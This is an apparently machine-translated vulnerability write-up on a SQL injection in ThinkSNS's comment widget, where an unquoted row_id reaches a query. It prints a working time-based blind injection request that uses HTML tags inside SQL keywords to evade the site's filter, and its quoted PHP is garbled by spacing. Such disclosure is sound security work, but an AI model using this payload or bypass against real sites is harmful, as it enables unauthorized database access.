SQL Injection in ThinkSNS

SQL Injection in ThinkSNS

ThinkSNS is the first vulnerability in the series. improper handling of some vulnerabilities leads to SQL injection.

Vulnerabilities are found in Comment widgets:

 

\ Addons \ widget \ CommentWidget. class. php: 138/*** Add Comment operation ** @ return array comment addition status and prompt information */public function addcomment () {// default value of returned result set $ return = array ('status' => 0, 'data' => L ('Public _ CONCENT_IS_ERROR ')); // get received data $ data =$ _ POST; // security filter foreach ($ data as $ key => $ val) {$ data [$ key] = t ($ data [$ key]);} // comment and comment content $ data ['app'] = $ data ['app _ name']; $ data ['table'] = $ dat A ['table _ name']; $ data ['content'] = h ($ data ['content']); // determine whether the resource is deleted. $ dao = M ($ data ['table']); $ idField = $ dao-> getPk (); $ map [$ idField] = $ data ['row _ id']; $ sourceInfo = $ dao-> where ($ map)-> find (); if (! $ SourceInfo) {$ return ['status'] = 0; $ return ['data'] = 'content deleted, comment failed '; exit (json_encode ($ return ));}.................. // Add comment operation $ data ['comment _ id'] = model ('comment')-> addComment ($ data ); if ($ data ['comment _ id']) {$ return ['status'] = 1; $ return ['data'] = $ this-> parseComment ($ data); // synchronize data to a micro-bar if ($ data ['app'] = 'weiba ') $ this-> _ upatetoweba ($ data );...............}

$ _ POST becomes $ data after $ data [$ key] = t ($ data [$ key.

After adding a comment, the system will select which applications to synchronize to based on $ data ['app'], for example:
// Synchronize data to the micro bar

if ($data ['app'] == 'weiba')    $this->_upateToweiba ( $data );

\addons\widget\CommentWidget\CommentWidget.class.php:252:
// Synchronize data to the micro bar

function _upateToweiba($data) {    $postDetail = D ( 'weiba_post' )->where ( 'feed_id=' . $data ['row_id'] )->find ();    if (! $postDetail)        return false;    ... ... ... ... ...}

$ Data ['row _ id'] enters $ postDetail = D ('weba _ Post')-> where ('feed _ id = '. $ data ['row _ id'])-> find (), which is not enclosed by single quotes.

$ Data ['row _ id'] is a controllable variable in the foreground, from $ _ POST ['row _ id'] And so. SQL Injection exists here.

Because the front-end of ThinkSNS has WAF, it is necessary to bypass t:

\ Core \ OpenSociax \ functions. inc. php: 630
/**

* T function is used to filter tags and output clean text without html * @ param string text content * @ return string processed content */function t ($ text) {$ text = nl2br ($ text); $ text = real_strip_tags ($ text); $ text = addslashes ($ text); $ text = trim ($ text ); return $ text ;}

All variables passing through t () pass through real_strip_tags ($ text ):

\core\OpenSociax\functions.inc.php:2274function real_strip_tags($str, $allowable_tags="") {    $str = html_entity_decode($str,ENT_QUOTES,'UTF-8');    return strip_tags($str, $allowable_tags);}

The strip_tags ($ str, $ allowable_tags) in real_strip_tags ($ text) filters out tags, so you can insert tags in SQL keywords to bypass waf, finally, SQL injection can be used.

For time-based blind injection, all POST requests must carry the correct referer.
 

POST /index.php?app=widget&mod=Comment&act=addcomment&uid=1app_name=weiba&table_name=user&content=test&row_id=2 a<a>nd 0=sle<a>ep(2);-- -&app_detail_summary=

 

 

Solution:

Add single quotes around SQL query parameters